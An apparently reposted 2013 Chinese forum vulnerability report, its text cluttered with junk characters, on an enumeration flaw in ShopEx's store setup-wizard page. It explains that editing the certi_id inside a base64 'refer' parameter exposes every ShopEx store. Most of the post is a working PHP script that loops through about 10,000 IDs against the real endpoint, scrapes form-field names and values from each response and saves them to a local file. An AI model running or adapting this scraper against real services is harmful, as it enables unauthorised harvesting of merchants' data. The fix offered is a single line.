|
|
简要描述:
3 R# Q- C8 n) ^$ X& O$ TShopEx某接口缺陷,可遍历所有网站
# |' D4 p ] l7 }* V详细说明:
3 s% b! V R0 E* }! y$ r: l问题出现在shopex 网店使用向导页面
# z3 N) u" n7 E" Y4 B) j; S \9 ?
" k' s2 N2 k: G% z. R( q$ e* b) q6 h( A, B
; b# |2 j* f+ A6 X8 t0 Y6 Ihttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
- r# Z9 l" Q& l2 F, s; R! S5 f7 j. e: P# X) N0 y& b
) o: i% }: u, s, P
; q5 _) ~8 H9 t( ^! {( nrefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}2 P' Z; x: F8 W
- o- ^2 }/ k4 S3 |* X" M
( ~0 N# s' q$ y5 G& d. U D( |+ E N2 j
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
( h6 t/ i6 q# d& D: S: y' I9 E5 Y, p/ {' F# D& a
6 G; J- u x/ y5 K# _7 _) | a
) D3 D3 S# M8 a2 {) d# I0 v<?php
/ Q/ } S4 U1 A9 v
D6 A# y6 T+ { s" J% E/ K for ($i=1; $i < 10000; $i++) { //遍历
& Y! ?* x7 B3 s' J$ a' M7 |( x0 f* s0 o0 [
ShowshopExD($i);
7 B9 @, o9 a o- D8 C$ q+ |3 U! Q: @2 P5 v n0 E! x8 Q
}2 h" G$ b; r% V0 l$ \& S
' ~9 |* @/ q3 A! B+ D8 j
function ShowshopExD($cid) {+ `7 K7 |! V% {# t+ E
1 h* m( e7 k! d, @/ R8 I I
$url='http://guide.ecos.shopex.cn/step2.php';; P; s0 d: y- Z" u: w
* n6 P1 C" K+ a3 V $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
i; U5 Y- z& ]& d( a0 d8 ?! C9 Z! } E( B- N u& I
$url = $url.'?refer='.$refer;- L- a. V- F5 D. h/ I# ~0 A( w
+ I) Q1 u( L) X6 i4 \7 S
$ch = curl_init($url);9 }( M; A5 u& T. ~4 o2 Y& f
- |" Y! f3 H* i- G/ q; n4 J curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
1 H1 f( _2 R, K) p; r
3 f' ~* C" A$ r' x curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
j" M: M# e D _$ H2 w# s, f9 }2 j
8 C/ E1 q# P& X5 ` $result = curl_exec($ch);
6 c) u8 P" [( V4 E9 {' T9 C7 I4 G) u! t$ U
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
* A! [1 N+ E7 B/ Q. a4 r d" n3 A4 g' I2 U
if(strpos($result,$refer))
, b' W: s% u4 t3 g% m6 c0 ]( |
, x$ t0 d+ k/ Q: X {# Z* ~% H% T( Y. D
0 R) Z" e# o7 X2 k $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
+ z e& K) \5 z4 t- M& E
7 t- y( U& ?* W1 R! P& o preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
" g# E& o. k( D
9 t4 R, v" Y* k3 L& f, j foreach ($value[1] as $key) {
# v1 s+ m8 _" O2 Z
% [+ ]2 q6 d4 n% _ preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
; {# q) D# U+ G& k6 U% i( X$ R t: P+ }
echo $res[1][0].':'.$res[3][0]."\r\n";; v X3 {6 _/ |3 }! y) L. L4 n# H& _
3 S. H: y$ A% o e+ |9 u# g+ ? $col =$res[1][0].':'.$res[3][0]."\r\n";
' i5 i7 x6 i f c2 _) b7 H: F5 k0 y. Q4 h2 B0 d. R
fwrite($fp, $col, strlen($col)); 9 ?. X1 |% \4 o+ `0 ~3 ~0 l, z. N
5 }( D* @2 s8 s( m, }$ a; E f }
9 ]3 {& X3 l0 {( z& w. ^8 l9 [
9 x0 }6 [3 S$ l6 z, l echo '--------------------------------'."\r\n";
0 g4 S3 Q2 Q2 F$ J! |( l
; A% _. Y# U% i) s7 M fclose($fp);
: p1 k' f$ H3 g& l/ x+ l9 N8 Z
5 T) l5 d! b* D. x* v } _1 V' K: h$ g4 q# `: M8 i2 t
* u/ L# @+ l$ o6 O1 g( q+ _% ` flush();( ]9 W4 B# z9 @0 B5 p9 P6 U1 j- ?
, M2 g5 J6 n6 c curl_close($ch);6 P. X: z9 n$ a+ A' f" M& o1 P
4 d: l: i' }9 \$ R# Y
}
2 M5 C1 h. g3 F5 R! g7 ]
! J0 R; f1 z# s+ @& ~6 U" e0 h( V+ [$ P?>/ n/ g- K" R+ B
漏洞证明:( |" {1 ~5 x# q2 a
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
# x6 [8 q) @6 G% T2 U8 Yrefer换成其他加密方式
+ \) r2 X( [/ l. ~" y |
|
发表于 2013-9-21 15:59:47
收藏
支持
反对